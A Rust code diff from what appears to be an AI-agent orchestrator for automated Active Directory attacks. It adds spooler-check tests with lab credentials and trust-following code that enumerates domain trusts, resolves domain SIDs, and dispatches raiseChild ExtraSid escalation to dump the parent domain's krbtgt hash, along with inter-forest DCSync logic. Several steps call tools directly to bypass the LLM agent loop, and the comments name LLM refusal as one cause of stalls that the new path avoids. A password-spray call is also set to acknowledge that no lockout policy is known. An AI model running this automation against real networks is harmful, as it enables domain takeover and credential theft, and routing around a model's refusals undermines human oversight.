collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_host_with_credential_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "spooler:192.168.58.22"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_hosts_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.22")); + assert!(ips.contains(&"192.168.58.23")); + } + + #[test] + fn collect_dedup_skips_already_processed_host() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into()); + let work = collect_spooler_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.23", "srv02.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into()); + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.23"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + // Only fabrikam credential available for contoso host + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_host_without_fqdn_gets_empty_domain() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "srv01")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_spooler_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + // Falls back to first credential since domain is empty + assert_eq!(work[0].credential.username, "admin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/stall_detection.rs b/ares-cli/src/orchestrator/automation/stall_detection.rs index 9b160bcf..181470ce 100644 --- a/ares-cli/src/orchestrator/automation/stall_detection.rs +++ b/ares-cli/src/orchestrator/automation/stall_detection.rs @@ -161,6 +161,7 @@ pub async fn auto_stall_detection( "target_ip": dc_ip, "domain": domain, "use_common_passwords": true, + "acknowledge_no_policy": true, }); match dispatcher diff --git a/ares-cli/src/orchestrator/automation/trust.rs b/ares-cli/src/orchestrator/automation/trust.rs index 598871ca..f46a018e 100644 --- a/ares-cli/src/orchestrator/automation/trust.rs +++ b/ares-cli/src/orchestrator/automation/trust.rs @@ -9,6 +9,7 @@ //! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm //! ticket creation and secretsdump against the foreign DC. +use std::collections::HashSet; use std::sync::Arc; use std::time::Duration; @@ -16,6 +17,8 @@ use serde_json::json; use tokio::sync::watch; use tracing::{debug, info, warn}; +use ares_llm::ToolCall; + use crate::orchestrator::dispatcher::Dispatcher; use crate::orchestrator::state::*; @@ -42,6 +45,150 @@ fn trust_account_name(flat_name: &str) -> String { format!("{}$", flat_name.to_uppercase()) } +/// Returns true when source and target are in different forests +/// (neither is a parent or child of the other, and they are not equal). +/// +/// Inter-forest trusts are subject to SID filtering on the target DC, which +/// strips ExtraSid claims with RID < 1000 (Enterprise Admins, Domain Admins, +/// Administrator). The inter-realm TGT authenticates but the privileged claim +/// is silently dropped — DCSync against the target DC then fails with +/// `rpc_s_access_denied`. This helper distinguishes the doomed path from +/// child→parent escalation (intra-forest), which is exploitable. +fn is_inter_forest(source: &str, target: &str) -> bool { + let s = source.to_lowercase(); + let t = target.to_lowercase(); + if s.is_empty() || t.is_empty() || s == t { + return false; + } + if s.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{s}")) { + return false; + } + true +} + +/// Returns true if the trust source→target is inter-forest with SID filtering +/// active — meaning `forge_inter_realm_and_dump` will be rejected at DCSync +/// regardless of trust key validity. Caller should suppress the doomed +/// dispatch and accelerate cross-forest fallback paths instead. +/// +/// Decision tree: +/// - Intra-forest (child↔parent or same domain): false (raise_child handles it) +/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=true`: true +/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=false`: +/// false (someone disabled SID filtering — try the forge) +/// - No `TrustInfo` but the names are inter-forest: false (try the forge — +/// missing metadata means we can't be sure SID filtering is on, and the +/// ~30s cost of an unnecessary attempt is cheaper than silently dropping +/// a valid attack path on a misconfigured trust) +fn is_filtered_inter_forest_trust(state: &StateInner, source: &str, target: &str) -> bool { + if !is_inter_forest(source, target) { + return false; + } + let target_l = target.to_lowercase(); + // Look up only the target's metadata. `trusted_domains` is keyed by the + // foreign-side domain name in each enumeration result, so the entry for + // `target_l` describes the source→target relationship. Falling back to + // the source key returns *some other* trust the source happens to have + // (e.g. child→contoso parent_child stored under "contoso.local" + // when we query contoso→fabrikam), which would wrongly classify the + // unknown cross-forest path as intra-forest and let the doomed forge fire. + if let Some(t) = state.trusted_domains.get(&target_l) { + if t.is_cross_forest() { + return t.sid_filtering; + } + // Trust enumeration disagrees with name-based heuristic — trust the + // explicit metadata (e.g. unusual same-forest cross-DNS-suffix setup). + return false; + } + // No metadata — try the forge. False positives (SID filtering actually on) + // cost ~30s for a doomed DCSync attempt; false negatives (refusing a valid + // attack on a misconfigured trust where SID filtering is off) cost the + // entire foreign domain. Prefer the cheaper failure mode. + false +} + +/// Clear cross-forest fallback dedup keys for `target_domain` so the next +/// tick of `auto_cross_forest_enum`, `auto_foreign_group_enum`, and +/// `auto_acl_discovery` re-fires against the foreign forest with current +/// credentials. Called when a doomed forest_trust_escalation is suppressed +/// — the trust hash extraction usually populates new state (DC IPs, SIDs) +/// that should kick the fallbacks back into action. +async fn wake_cross_forest_fallbacks(dispatcher: &Dispatcher, target_domain: &str) { + let target_l = target_domain.to_lowercase(); + // (set_name, prefix) pairs — must stay in sync with the auto_*_enum + // dedup-key formats in their respective modules. + let mut prefixes: Vec<(&str, String)> = vec![ + (DEDUP_CROSS_FOREST_ENUM, format!("xforest:{target_l}:")), + ( + DEDUP_FOREIGN_GROUP_ENUM, + format!("foreign_group:{target_l}"), + ), + (DEDUP_ACL_DISCOVERY, format!("acl_disc:{target_l}:")), + ]; + + // ADCS dedup keys are `{host}:cred:{user@dom}` / `{host}:hash:{user@dom}`, + // keyed on the CA host (IP or hostname) — not the target domain. So for + // each known host that belongs to `target_domain`, add a `{host}:` prefix. + // This lets a freshly-acquired cross-forest credential re-attempt + // certipy_find against a fabrikam CA that was previously locked by a wrong + // initial cred. + { + let s = dispatcher.state.read().await; + let suffix = format!(".{target_l}"); + for h in s.hosts.iter() { + let hostname = h.hostname.to_lowercase(); + let belongs = + !hostname.is_empty() && (hostname == target_l || hostname.ends_with(&suffix)); + if !belongs { + continue; + } + if !h.ip.is_empty() { + prefixes.push((DEDUP_ADCS_SERVERS, format!("{}:", h.ip))); + } + prefixes.push((DEDUP_ADCS_SERVERS, format!("{hostname}:"))); + } + } + + let cleared: Vec<(&str, Vec)> = { + let mut s = dispatcher.state.write().await; + prefixes + .iter() + .map(|(set, prefix)| (*set, s.unmark_processed_by_prefix(set, prefix))) + .filter(|(_, v)| !v.is_empty()) + .collect() + }; + let cleared_count: usize = cleared.iter().map(|(_, v)| v.len()).sum(); + if cleared_count == 0 { + // Nothing to clear means ACL/cross-forest enum never ran against this + // target — usually because no same-realm credential exists. Fallback + // wake is a no-op here; the orchestrator will keep flailing on + // NTLM-bound paths that 0x52e against the foreign forest. Logging + // this signal makes the architectural gap visible in the trace. + info!( + target = %target_domain, + "wake_cross_forest_fallbacks: no dedup keys to clear — \ + ACL/foreign-group/cross-forest enum never registered for this \ + target (likely no same-realm credential). Forge-only fallback \ + via create_inter_realm_ticket would be needed to bind LDAP \ + via Kerberos." + ); + } else { + info!( + target = %target_domain, + cleared_count, + "wake_cross_forest_fallbacks: cleared dedup keys to retrigger fallback enums" + ); + } + for (set, keys) in cleared { + for key in keys { + let _ = dispatcher + .state + .unpersist_dedup(&dispatcher.queue, set, &key) + .await; + } + } +} + /// Check if a credential domain matches a target domain (exact, child, or parent). fn is_domain_related(cred_domain: &str, target_domain: &str) -> bool { let cd = cred_domain.to_lowercase(); @@ -81,25 +228,38 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: // Two dedup keys per domain: // trust_enum: — password-based attempt // trust_enum_hash: — hash-based retry (for dominated domains) - let enum_work: Vec<(String, String, String)> = state + // + // Iterate the union of `domain_controllers` keys and + // `dominated_domains`. The latter covers the case where a + // domain was compromised (e.g. via raise_child to the parent) + // but its DC was never explicitly seeded into + // `domain_controllers` — without this, parent-DC trust + // enumeration would never fire and cross-forest trusts would + // remain undiscovered. + let mut candidate_domains: HashSet = state .domain_controllers + .keys() + .map(|d| d.to_lowercase()) + .collect(); + for d in state.dominated_domains.iter() { + candidate_domains.insert(d.to_lowercase()); + } + let enum_work: Vec<(String, String, String)> = candidate_domains .iter() - .filter(|(domain, _)| { - let key = trust_enum_dedup_key(domain, false); - let hash_key = trust_enum_dedup_key(domain, true); - !state.is_processed(DEDUP_TRUST_FOLLOW, &key) - || (!state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key) - && state.dominated_domains.contains(&domain.to_lowercase())) - }) - .map(|(domain, dc_ip)| { - // Use hash_key if password-based was already tried + .filter_map(|domain| { + let dc_ip = state.resolve_dc_ip(domain)?; let pw_key = trust_enum_dedup_key(domain, false); - let key = if state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key) { - trust_enum_dedup_key(domain, true) - } else { - pw_key - }; - (key, domain.clone(), dc_ip.clone()) + let hash_key = trust_enum_dedup_key(domain, true); + let pw_done = state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key); + let hash_done = state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key); + let dominated = state.dominated_domains.contains(domain); + // Skip if password attempt is done AND (no hash retry + // applies, or hash retry already done). + if pw_done && (!dominated || hash_done) { + return None; + } + let key = if pw_done { hash_key } else { pw_key }; + Some((key, domain.clone(), dc_ip)) }) .collect(); drop(state); @@ -164,39 +324,152 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: }; if let Some(cred_json) = cred_payload { - let payload = json!({ - "techniques": ["enumerate_domain_trusts"], - "target_ip": dc_ip, + // Direct tool dispatch — bypass the LLM agent loop. + // The recon prompt template did not surface + // `credential.hash` (only password), so LLM-driven trust + // enumeration with hash auth would render an empty + // password and fail with LDAP 52e. The orchestrator + // already owns every input here; deliver them directly + // to enumerate_domain_trusts via dispatch_tool. + let mut args = json!({ + "target": dc_ip, "domain": domain, - "credential": cred_json, + "username": cred_json + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""), }); + if let Some(p) = cred_json + .get("password") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + { + args["password"] = json!(p); + } + if let Some(h) = cred_json + .get("hash") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + { + args["hash"] = json!(h); + } + if let Some(bd) = cred_json + .get("domain") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty() && !s.eq_ignore_ascii_case(&domain)) + { + args["bind_domain"] = json!(bd); + } + + let call = ToolCall { + id: format!("trust_enum_{}", uuid::Uuid::new_v4().simple()), + name: "enumerate_domain_trusts".to_string(), + arguments: args, + }; + let task_id = format!( + "trust_enum_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); - match dispatcher - .throttled_submit("recon", "recon", payload, 3) + // Mark dedup BEFORE spawn so the next 30s tick doesn't + // re-dispatch while enumeration is in flight. + dispatcher + .state + .write() .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - domain = %domain, - auth = auth_method, - "Trust enumeration dispatched" - ); - dispatcher + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + + info!( + task_id = %task_id, + domain = %domain, + dc_ip = %dc_ip, + auth = auth_method, + "Dispatching enumerate_domain_trusts (direct tool, no LLM)" + ); + + let dispatcher_bg = dispatcher.clone(); + let domain_bg = domain.clone(); + let key_bg = key.clone(); + let auth_method_bg = auth_method.to_string(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("recon", &task_id, &call) + .await; + // Failure handling depends on which auth attempt + // just failed: + // + // - password attempt: leave the dedup mark in place + // so the next 30s tick sees `pw_done=true` and + // escalates to the hash-key path (gated on the + // domain being in `dominated_domains`). Clearing + // the mark would loop forever on the same wrong + // sibling-domain credential. + // - hash attempt: clear so a future tick can retry + // if a fresh hash becomes available. + let clear_dedup = || async { + dispatcher_bg .state .write() .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher + .unmark_processed(DEDUP_TRUST_FOLLOW, &key_bg); + let _ = dispatcher_bg .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .unpersist_dedup( + &dispatcher_bg.queue, + DEDUP_TRUST_FOLLOW, + &key_bg, + ) .await; + }; + let on_failure = || async { + if auth_method_bg == "password" { + // Mark stays — escalation to hash retry on next tick. + } else { + clear_dedup().await; + } + }; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + warn!( + err = %err, + domain = %domain_bg, + auth = %auth_method_bg, + "enumerate_domain_trusts returned error" + ); + on_failure().await; + return; + } + let trust_count = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("trusted_domains")) + .and_then(|t| t.as_array()) + .map(|a| a.len()) + .unwrap_or(0); + info!( + domain = %domain_bg, + trust_count = trust_count, + "enumerate_domain_trusts completed" + ); + } + Err(e) => { + warn!( + err = %e, + domain = %domain_bg, + auth = %auth_method_bg, + "enumerate_domain_trusts dispatch errored" + ); + on_failure().await; + } } - Ok(None) => { - debug!(domain = %domain, "Trust enum throttled — deferred"); - } - Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"), - } + }); } } } @@ -204,47 +477,111 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: // Child-to-parent escalation (ExtraSid via raiseChild) // - // When a parent_child trust is discovered and the child domain is dominated, - // dispatch a child_to_parent exploit task. The LLM prompt offers raiseChild - // (automated) and manual ExtraSid golden ticket as alternatives. + // Dispatches when a child domain is dominated and its parent FQDN is + // known. We derive the parent FQDN by stripping the leftmost label of + // the dominated child (always valid intra-forest — child FQDN is + // `{label}.{parent_fqdn}` by AD construction), then ALSO union with + // any explicit parent_child trusts discovered via LDAP enumeration. + // + // The intra-forest derivation lets us fire immediately on child DA, + // bypassing the trust enumeration round-trip — without it we'd block + // until `trusted_domains` was populated, which sometimes never + // happens (LLM refusal, network, throttle starvation). { let state = dispatcher.state.read().await; - if state.has_domain_admin && !state.trusted_domains.is_empty() { - let child_work: Vec<(String, String, String, String)> = state - .trusted_domains - .values() - .filter(|trust| trust.is_parent_child()) - .filter_map(|trust| { - let parent_domain = &trust.domain; + // Build the candidate child set as the union of dominated domains + // (krbtgt observed) and domains where we have a non-empty + // Administrator NTLM hash. The latter covers the common case where + // GOAD-style password reuse gives us a working DA hash via local + // SAM dumps before we ever DCSync krbtgt — without it the trust + // automation deadlocks waiting for krbtgt. + let mut candidate_children: HashSet = state + .dominated_domains + .iter() + .map(|d| d.to_lowercase()) + .collect(); + for h in state.hashes.iter() { + if h.username.eq_ignore_ascii_case("administrator") + && h.hash_type.eq_ignore_ascii_case("NTLM") + && !h.hash_value.is_empty() + && !h.domain.is_empty() + { + candidate_children.insert(h.domain.to_lowercase()); + } + } + if !candidate_children.is_empty() { + let mut child_work: Vec<(String, String, String, String)> = Vec::new(); + + // Path A: derived intra-forest. For each candidate child (FQDN + // with 3+ labels), the parent is `labels[1..].join(".")`. + for child_domain in candidate_children.iter() { + let cd_lower = child_domain.to_lowercase(); + let labels: Vec<&str> = cd_lower.split('.').collect(); + if labels.len() < 3 { + continue; + } + let parent_domain = labels[1..].join("."); + if parent_domain.is_empty() || !parent_domain.contains('.') { + continue; + } + if state.dominated_domains.contains(&parent_domain) { + continue; + } + // Require parent DC IP resolvable (via domain_controllers + // or hosts table) so secretsdump has a target IP. + let parent_dc_ip = match state.resolve_dc_ip(&parent_domain) { + Some(ip) => ip, + None => continue, + }; + let key = format!("raise_child:{}", cd_lower); + if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { + continue; + } + let child_dc_ip = match state.domain_controllers.get(&cd_lower) { + Some(ip) => ip.clone(), + None => continue, + }; + let _ = parent_dc_ip; // resolved later under fresh read lock + child_work.push((key, child_domain.clone(), parent_domain, child_dc_ip)); + } - // Skip if parent is already dominated + // Path B: explicit parent_child trusts from LDAP enumeration. + // Skip duplicates of Path A (same dedup key). + if !state.trusted_domains.is_empty() { + for trust in state.trusted_domains.values() { + if !trust.is_parent_child() { + continue; + } + let parent_domain = trust.domain.clone(); if state .dominated_domains .contains(&parent_domain.to_lowercase()) { - return None; + continue; } - - // Find a dominated child domain for this parent - // (child FQDN ends with .{parent}) - let child_domain = state.dominated_domains.iter().find(|d| { + let child_domain = match candidate_children.iter().find(|d| { d.to_lowercase() .ends_with(&format!(".{}", parent_domain.to_lowercase())) - })?; - + }) { + Some(d) => d.clone(), + None => continue, + }; let key = format!("raise_child:{}", child_domain.to_lowercase()); if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { - return None; + continue; } + if child_work.iter().any(|(k, _, _, _)| k == &key) { + continue; + } + let child_dc_ip = + match state.domain_controllers.get(&child_domain.to_lowercase()) { + Some(ip) => ip.clone(), + None => continue, + }; + child_work.push((key, child_domain, parent_domain, child_dc_ip)); + } + } - let dc_ip = state - .domain_controllers - .get(&child_domain.to_lowercase()) - .cloned()?; - - Some((key, child_domain.clone(), parent_domain.clone(), dc_ip)) - }) - .collect(); drop(state); for (key, child_domain, parent_domain, dc_ip) in child_work { @@ -347,13 +684,24 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: // Dispatch child-to-parent exploit task. The LLM prompt // offers raiseChild (automated) and manual ExtraSid golden // ticket creation as alternatives. + // `dc_ip` is the child DC (for trust key extraction). + // `target` should be the parent DC (for secretsdump after forging ticket). + // Use resolve_dc_ip so the hosts table fills in when + // domain_controllers lacks the parent — falls back to the + // child DC only as a last resort (DCSync can succeed + // against any writable DC in the parent domain). + let parent_dc_ip = { + let s = dispatcher.state.read().await; + s.resolve_dc_ip(&parent_domain) + .unwrap_or_else(|| dc_ip.clone()) + }; let mut payload = json!({ "technique": "create_inter_realm_ticket", "vuln_type": "child_to_parent", "domain": child_domain, "trusted_domain": parent_domain, "target_domain": parent_domain, - "target": &dc_ip, + "target": &parent_dc_ip, "dc_ip": dc_ip, "vuln_id": &vuln_id, }); @@ -363,50 +711,372 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: payload[k] = v.clone(); } } - // Add domain SIDs if already resolved - { + // Add domain SIDs and child krbtgt (for ExtraSid via child + // krbtgt — preferred path, no inter-realm trust key needed). + // + // The ExtraSid attack requires the PARENT forest SID (RID 519 + // = Enterprise Admins). If we ship the child SID by mistake, + // the parent KDC rejects the ticket with KDC_ERR_PREAUTH_FAILED + // because the embedded SID doesn't resolve to a real EA group. + // So if the parent SID isn't cached, resolve it via lookupsid + // against the parent DC using child admin creds (cross-trust + // SAMR works) BEFORE dispatching the exploit task. Defer the + // dispatch (no dedup mark) when resolution fails so the next + // 30s tick can retry once host scans / DC enumeration progress. + let parent_lower = parent_domain.to_lowercase(); + let cd_lower = child_domain.to_lowercase(); + let ( + mut have_target_sid, + mut have_source_sid, + child_admin_cred, + child_admin_hash, + child_dc_ip, + ) = { let s = dispatcher.state.read().await; - if let Some(sid) = s.domain_sids.get(&child_domain.to_lowercase()) { + if let Some(sid) = s.domain_sids.get(&cd_lower) { payload["source_sid"] = json!(sid); } - if let Some(sid) = s.domain_sids.get(&parent_domain.to_lowercase()) { + if let Some(sid) = s.domain_sids.get(&parent_lower) { payload["target_sid"] = json!(sid); } - } + if let Some(child_krbtgt) = s.hashes.iter().find(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.domain.to_lowercase() == cd_lower + && h.hash_type.to_uppercase() == "NTLM" + }) { + payload["child_krbtgt_hash"] = json!(child_krbtgt.hash_value); + } + let admin_cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == cd_lower + }) + .cloned(); + let admin_hash = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == cd_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + let child_dc = s.resolve_dc_ip(&child_domain); + ( + s.domain_sids.contains_key(&parent_lower), + s.domain_sids.contains_key(&cd_lower), + admin_cred, + admin_hash, + child_dc, + ) + }; - match dispatcher - .throttled_submit("exploit", "privesc", payload, 1) + if !have_target_sid { + if let Some((sid, admin_name)) = super::golden_ticket::resolve_domain_sid( + &parent_domain, + &parent_dc_ip, + child_admin_cred.as_ref(), + child_admin_hash.as_ref(), + ) .await - { - Ok(Some(task_id)) => { + { info!( - task_id = %task_id, + parent_domain = %parent_domain, + sid = %sid, + "Resolved parent domain SID via lookupsid for child-to-parent ExtraSid" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let _ = reader.set_domain_sid(&mut conn, &parent_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &parent_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(parent_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(parent_lower.clone(), name.clone()); + } + } + payload["target_sid"] = json!(sid); + have_target_sid = true; + } else { + warn!( child_domain = %child_domain, parent_domain = %parent_domain, - auth = auth_method, - "Child-to-parent escalation dispatched" + parent_dc_ip = %parent_dc_ip, + "Could not resolve parent SID — deferring child-to-parent dispatch" ); - let _ = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await; - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) - .await; - } - Ok(None) => { - debug!("Child-to-parent deferred by throttler"); } - Err(e) => { - warn!(err = %e, "Failed to dispatch child-to-parent escalation") + } + if !have_target_sid { + continue; + } + + // Resolve child domain SID if not cached (needed for ExtraSid golden ticket) + if !have_source_sid { + if let Some(ref child_dc) = child_dc_ip { + if let Some((sid, admin_name)) = + super::golden_ticket::resolve_domain_sid( + &child_domain, + child_dc, + child_admin_cred.as_ref(), + child_admin_hash.as_ref(), + ) + .await + { + info!( + child_domain = %child_domain, + sid = %sid, + "Resolved child domain SID via lookupsid for child-to-parent ExtraSid" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let _ = reader.set_domain_sid(&mut conn, &cd_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &cd_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(cd_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(cd_lower.clone(), name.clone()); + } + } + payload["source_sid"] = json!(sid); + have_source_sid = true; + } else { + warn!( + child_domain = %child_domain, + child_dc_ip = %child_dc, + "Could not resolve child SID — deferring child-to-parent dispatch" + ); + } + } else { + warn!( + child_domain = %child_domain, + "No child DC IP available — deferring child-to-parent dispatch" + ); } } + if !have_source_sid { + continue; + } + + // Use raiseChild.py (impacket's canonical child→parent ExtraSid + // automation) via DIRECT tool dispatch (no LLM in the loop). + // This replaces the previous golden_ticket + secretsdump_kerberos + // combo, which fails because impacket's cross-realm referral is + // broken (fortra/impacket#315): a child-realm ticket presented + // to the parent KDC returns KDC_ERR_WRONG_REALM / + // KDC_ERR_PREAUTH_FAILED. raiseChild forges the inter-realm + // chain internally and dumps parent krbtgt + Administrator in + // one shot. + // + // Direct dispatch_tool bypasses the LLM agent loop entirely — + // the orchestrator owns every input (child admin hash, child + // DC IP, parent DC IP), so there is no value in laundering them + // through an LLM that might typo or omit args. + let admin_hash_value = child_admin_hash.as_ref().map(|h| h.hash_value.clone()); + let admin_password = child_admin_cred + .as_ref() + .map(|c| c.password.clone()) + .filter(|p| !p.is_empty()); + if admin_hash_value.is_none() && admin_password.is_none() { + warn!( + child_domain = %child_domain, + parent_domain = %parent_domain, + "No child Administrator hash or password — deferring child-to-parent (raise_child needs auth)" + ); + continue; + } + + // raiseChild auto-discovers parent forest root via the + // child DC's trustedDomain LDAP objects and resolves DC IPs + // via DNS — script-level flags for IP/domain are unsupported + // (argparse exit 2). However, on workers without forest DNS, + // the bare domain FQDN (`child.contoso.local`) won't + // resolve — so pass the IPs so the tool wrapper can + // pre-seed `/etc/hosts` before invoking impacket. + let mut raise_args = json!({ + "child_domain": child_domain.clone(), + "username": "Administrator", + }); + if let Some(h) = admin_hash_value { + raise_args["hash"] = json!(h); + } else if let Some(p) = admin_password { + raise_args["password"] = json!(p); + } + if let Some(ref ip) = child_dc_ip { + raise_args["child_dc_ip"] = json!(ip); + } + raise_args["parent_domain"] = json!(parent_domain.clone()); + if !parent_dc_ip.is_empty() { + raise_args["parent_dc_ip"] = json!(parent_dc_ip.clone()); + } + + let call = ToolCall { + id: format!("raise_child_{}", uuid::Uuid::new_v4().simple()), + name: "raise_child".to_string(), + arguments: raise_args, + }; + let task_id = format!( + "trust_raise_child_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + // Mark dedup BEFORE spawning so the next 30s tick doesn't + // re-dispatch the same trust while raiseChild is running. + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + + info!( + task_id = %task_id, + child_domain = %child_domain, + parent_domain = %parent_domain, + auth = auth_method, + "Dispatching raise_child (direct tool, no LLM)" + ); + + // Spawn so the trust loop continues processing other items + // while raiseChild runs (typically 30–120s). mark_exploited + // is gated on observed parent krbtgt — no premature marking. + let dispatcher_bg = dispatcher.clone(); + let parent_domain_bg = parent_domain.clone(); + let child_domain_bg = child_domain.clone(); + let vuln_id_bg = vuln_id.clone(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("privesc", &task_id, &call) + .await; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + let tail: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::() + .chars() + .rev() + .collect(); + warn!( + err = %err, + child_domain = %child_domain_bg, + parent_domain = %parent_domain_bg, + output_tail = %tail, + "raise_child returned error" + ); + return; + } + // Verify parent compromise — only mark exploited + // when we actually observe parent krbtgt. + // + // Inspect exec_result.discoveries directly: + // dispatch_tool returns BEFORE push_realtime_discoveries + // finishes pumping hashes into state.hashes, so reading + // state here is too early and produces a false negative. + let parent_lower = parent_domain_bg.to_lowercase(); + let has_parent_krbtgt = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("hashes")) + .and_then(|h| h.as_array()) + .map(|hashes| { + hashes.iter().any(|h| { + let user = h + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let dom = h + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let htype = h + .get("hash_type") + .and_then(|v| v.as_str()) + .unwrap_or(""); + user.eq_ignore_ascii_case("krbtgt") + && dom.to_lowercase() == parent_lower + 